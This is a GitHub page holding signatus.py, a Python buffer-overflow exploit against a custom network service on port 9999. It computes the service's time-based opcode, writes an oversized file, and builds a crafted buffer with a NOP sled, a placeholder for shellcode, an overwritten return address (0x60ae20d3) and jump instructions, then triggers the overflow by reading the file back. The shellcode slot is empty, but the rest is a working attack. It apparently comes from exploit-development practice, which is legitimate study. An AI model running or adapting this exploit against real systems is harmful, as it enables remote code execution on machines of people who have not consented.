-
-
Notifications
You must be signed in to change notification settings - Fork 5
/
signatus.py
99 lines (83 loc) · 2.25 KB
/
signatus.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/python
import socket
import sys
from struct import pack
import time
server = sys.argv[1]
port = 9999
def send_message(s, buffer):
s.send(buffer)
def get_opcode():
current_time = int(time.time()) // 10
last_digits = str(hex(current_time))[-2:]
val = int(last_digits, 16)
val2 = val*val
val3 = val*val*val
val4 = val*val*val*val
aux = val3 // 0x100 * 0x100
aux = aux * 0x10
aux = aux | val2
aux = aux // 0x10 * 0x10
aux2 = val4 // 0x1000 * 0x1000
aux2 = aux2 * 0x100
aux3 = aux | aux2
aux3 = aux3 * 0x10
aux3 = aux3 | val
aux4 = str(hex(aux3))[-8:]
aux4 = int(aux4, 16)
aux4 = aux4 ^ int("0x74829726",16)
return hex(aux4)
def write_file(text):
print("Writing content to file (Opcode 1)")
opcode = get_opcode()
print("OTD: %s\n"%opcode)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
buffer = pack("<L", int(opcode, 16))
send_message(s, buffer)
buffer2 = pack("<L", 0x1)
send_message(s, buffer2)
buffer3 = text
send_message(s, buffer3)
s.close()
def read_file():
print("Reading content from file (Opcode 2)")
opcode = get_opcode()
print("OTD: %s\n"%opcode)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
buffer = pack("<L", int(opcode, 16))
send_message(s, buffer)
buffer2 = pack("<L", 0x2)
send_message(s, buffer2)
res = (s.recv(1024))
print(res)
s.close()
def delete_file():
print("Deleting content from file (Opcode 3)")
opcode = get_opcode()
print("OTD: %s\n"%opcode)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
buffer = pack("<L", int(opcode, 16))
send_message(s, buffer)
buffer2 = pack("<L", 0x3)
send_message(s, buffer2)
s.close()
def main():
delete_file()
time.sleep(5)
write_file(b"E"*0x800)
time.sleep(5)
payload = b"" # ADD PAYLOAD
buff = b"\x90"*24
buff += payload
buff += b"A"*(806-len(buff))
buff += b"\x90\x90\xeb\x04"
buff += pack("<L", 0x60ae20d3) # bp 0x60ae20d3; g
buff += b"\xe9\xcd\xfc\xff\xff"
buff += b"D"*(2048-len(buff))
write_file(buff)
time.sleep(5)
read_file()
main()